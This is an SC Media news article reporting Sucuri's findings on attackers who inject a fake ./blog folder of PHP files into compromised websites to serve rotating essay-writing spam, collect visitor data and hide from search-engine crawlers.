Threat Management, Network Security

Write and wrong: Attackers compromise websites with subdirectory files to promote ‘essay spam’

Cybercriminals are injecting folders with malicious subdirectories into legitimate websites in order to display spam content that advertises essay-writing services for students, Sucuri has reported.

In a blog post published last Friday, Sucuri cited a recently discovered scheme in which bad actors inject a ./blog folder full of malicious PHP files into a compromised website. Although the folder appears to be a legitimate blog directory, when accessed with a web browser it displays an "essay spam" website. "What makes it even more interesting is the fact that every time you reload the page, it shows a completely different essay website," the blog post explained.

Sucuri first began looking into this technique late last year. "Instead of injecting the malware into an existent theme/plugin file to generate the spam, they added everything into a very common directory name (blog) to trick the user into thinking that the directory is valid and it shouldn't be touched," explained Sucuri remediation lead and blog post author Fernando Barbosa, in an email interview with SC Media.

The PHP code contained within the subdirectory files gathers various data from the compromised websites' visitors – including user agent, IP address, referrer and HTTP Accept-Language and sends it to the malicious URL gotopplz[.]xyz, Sucuri noted. In response, this domain uses the JSON data interchange format to fetch content from various essay spam sites. The web security company also observed the presence of two variables sent to gotopplz[.]xy that is likely used to identify and track individual spam campaigns in order to allocate profits generated from the illicit ad views to the correct parties.

As a measure to prevent search engines from detecting the essay spam, the script returns a "404 Not Found" error for user agents such as Googlebot and MSNbot, Sucuri further reported. Moreover, if the script is unable to successfully retrieve content from the malicious server, the PHP code will instead display a full HTML page displaying the essay-writing ads, ensuring the site visitor is still subjected to the spam content.

SC Media has contacted Sucuri for additional details.

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.